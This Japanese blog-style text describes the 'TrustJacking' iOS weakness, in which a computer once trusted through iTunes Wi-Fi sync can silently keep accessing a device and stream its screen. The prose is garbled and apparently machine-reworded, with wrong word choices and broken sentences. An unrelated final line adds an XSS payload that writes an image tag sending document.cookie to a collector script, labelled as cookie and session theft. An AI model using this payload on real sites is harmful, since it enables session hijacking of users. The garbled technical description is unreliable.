iPhone クライアントの最も顕著に恐ろしい悪夢は、同じ部屋にいるのを待たずにすべてのアクションを記録および制御できる機能を含む、自分のガジェットを誰かに監視させることです。このブログ エントリでは、攻撃者がまさにそれを実行できる「トラストジャッキング」と呼ばれる別の弱点を紹介します。
この脆弱性は、iTunes Wi-Fi 同期と呼ばれる iOS ハイライトを悪用し、クライアントが実際に PC に接続せずに iOS ガジェットを処理できるようにします。iOS ガジェットの所有者が同様の組織に所属している場合に単独でタップすると、攻撃者がガジェットを監視することが許可されます。さらに、関連する過去の弱点を概観し、iPhone がそれらを軽減するために行ってきた進歩と、それらが比較攻撃を十分に防ぐことができない理由を示します。
iOS ガジェットを別の PC に接続した後、クライアントは、関連付けられた PC を信頼するかどうかを調べられます。PC が標準の iTunes API を使用して iOS ガジェットと通信することを許可していると信じることにしました。
これにより、PC は、クライアントからの再度の確認を必要とせず、認識可能な兆候なしで、ガジェット上の写真にアクセスし、補強を実行し、アプリケーションを導入するなどのさまざまな作業を行うことができます。さらに、これにより「iTunes Wi-Fi 同期」ハイライトの実行が可能になり、PC と iOS ガジェットが関連付けられている限り、PC から切り離された後でもガジェットとのこの種の通信を続行することが考えられます。似たような組織と。興味深いのは、「iTunes Wi-Fi 同期」を有効にするのに被害者の承認は必要なく、PC 側から簡単に指示できることです。
ガジェットの画面のライブ ストリームの取得は、画面キャプチャを継続的に要求し、離れた場所から表示または録画することで効果的に可能になります。
失望という根底にある唯一の目的、執念深い PC を承認すること以外に、このアクセスの進行を阻止する要素は何もないことに注意することが不可欠です。同様に、USB リンクが切断された後であっても、PC を承認することでガジェットへのアクセスを許可することをクライアントに通知するものは何もありません。

document.write(<img.src=https://localhost/submitcookie.php cookie =+エスケープ(document.cookie) +/>); (CookieとセッションIDの盗難)